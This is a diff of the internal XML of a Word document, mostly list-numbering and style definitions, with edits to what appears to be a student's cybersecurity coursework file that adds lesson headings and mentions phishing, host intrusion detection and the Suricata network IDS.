+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="762402F2"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="71A42722"/>
+    <w:lvl w:ilvl="0" w:tplc="08090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7C440E2D"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="077453B6"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7D592090"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="EE2A680C"/>
+    <w:lvl w:ilvl="0" w:tplc="08090005">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="910578059">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="375737098">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="1564438774">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="645158986">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="1112478449">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="1367681353">
+    <w:abstractNumId w:val="12"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="624894024">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="1675263311">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="64765147">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="41755761">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="11" w16cid:durableId="1412846859">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="12" w16cid:durableId="1053771558">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="13" w16cid:durableId="1387921412">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="14" w16cid:durableId="1179661771">
+    <w:abstractNumId w:val="13"/>
   </w:num>
 </w:numbering>
 </file>
@@ -4697,6 +9322,28 @@
       <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading4">
+    <w:name w:val="heading 4"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading4Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="007C322B"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="40" w:after="0"/>
+      <w:outlineLvl w:val="3"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
@@ -4879,6 +9526,49 @@
       <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
       <w:sz w:val="24"/>
       <w:szCs w:val="24"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC3">
+    <w:name w:val="toc 3"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="007C322B"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="440"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
+    <w:name w:val="Heading 4 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading4"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="007C322B"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:i/>
+      <w:iCs/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="NormalWeb">
+    <w:name w:val="Normal (Web)"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="002725F1"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+      <w:lang w:eastAsia="en-GB"/>
     </w:rPr>
   </w:style>
 </w:styles>

--- a/BoK.docx
+++ b/BoK.docx
@@ -225,7 +225,7 @@
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorBidi"/>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorBidi" w:cstheme="minorBidi"/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -2296,12 +2296,74 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Lesson </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>Task: To get a better understanding of these threats and attacks find articles on internet about any malware.</w:t>
       </w:r>
     </w:p>
@@ -2759,6 +2821,7 @@
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Phishing</w:t>
       </w:r>
       <w:bookmarkEnd w:id="5"/>
@@ -2864,7 +2927,6 @@
           <w:bCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">General Phishing </w:t>
       </w:r>
       <w:r>
@@ -3274,6 +3336,14 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:ind w:left="360"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -3287,6 +3357,61 @@
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc113747827"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Lesson 2.2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
@@ -3299,7 +3424,6 @@
           <w:lang w:val="en-AS"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc113747827"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
@@ -3395,6 +3519,11 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
         <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:rPr>
@@ -3525,7 +3654,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> Host Intrusion Detection </w:t>
       </w:r>
       <w:r>
@@ -3682,13 +3810,155 @@
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:color w:val="2D3B45"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>Suricata</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">For network-IDS I decided to use Suricata package as it is available in </w:t>
+      </w:r>
